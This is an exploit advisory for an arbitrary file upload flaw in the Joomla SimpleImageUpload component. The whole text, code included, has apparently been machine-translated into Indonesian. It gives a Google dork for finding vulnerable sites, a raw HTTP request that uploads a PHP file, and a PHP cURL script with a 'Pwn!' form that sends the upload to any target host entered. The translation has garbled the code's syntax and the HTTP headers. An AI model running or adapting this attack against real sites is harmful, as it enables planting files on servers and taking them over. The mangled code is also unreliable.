Joomla Sederhana Gambar Upload Sewenang Upload File

# Exploit Judul: Joomla Sederhana Gambar Upload - Sewenang Upload File
# Google Dork: inurl: option = com_simpleimageupload
# Tanggal: 2015/06/23
# Exploit Penulis: CrashBandicotDosPerl
# Penjual Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Versi: 1.0
# Diuji pada: MsWin32

# Vuln Sama untuk Com_Media Kerentanan

# Hidup Permintaan:

POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP / 1.1

Host: 127.0.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; rv: 31.0) Gecko / 20100101 Firefox / 31.0
Terima: text / html, aplikasi / xhtml + xml, aplikasi / xml; q = 0,9, * / *; q = 0,8
Terima-Bahasa: en-us, en; q = 0,5
Terima-Encoding: gzip, mengempis
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Koneksi: terus-hidup
Content-Type: multipart / form-data; batas = --------- 247062787817068

---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "Filedata"; filename = "L0v3.php." \ r \ n
Content-Type: application / x-php \ r \ n
\ r \ n
0wn3d! ;) \ r \ n
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "kembali-url" \ r \ n
\ r \ n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
---------- 247062787817068- \ r \ n

# Exploit:

<? php

gema '<form action = metode "#" = "post" enctype = "multipart / form-data">
<input type = "text" name = "target" value = "www.localhost.com" /> <input type = "submit" name = "Pwn" value = "Pwn!" />
</ form> ';

if ($ _ POST) {

$ target = $ _POST ['target'];

$ file = "0wn3d! ;) ";
$ sundulan = array ("Content-Type: application / x-php",
"Content-Disposition: form-data; name = \ "Filedata \"; file = \ "L0v3.php \." ");

$ ch = curl_init(“http://”.$target.”/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component”);
curl_setopt ($ ch, CURLOPT_POST, true);
curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537,36 (KHTML, seperti Gecko) Chrome / Safari 43.0.2357.124 / 537,36");
curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('Filedata' => "@ $ file", "kembali-url" => “aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=”,));
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header);
$ hasil = curl_exec ($ ch);
curl_close ($ ch);
mencetak "$ hasil";

} Else {die (); }
?>

# Jalur File: 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t untuk Mr_AnarShi-T;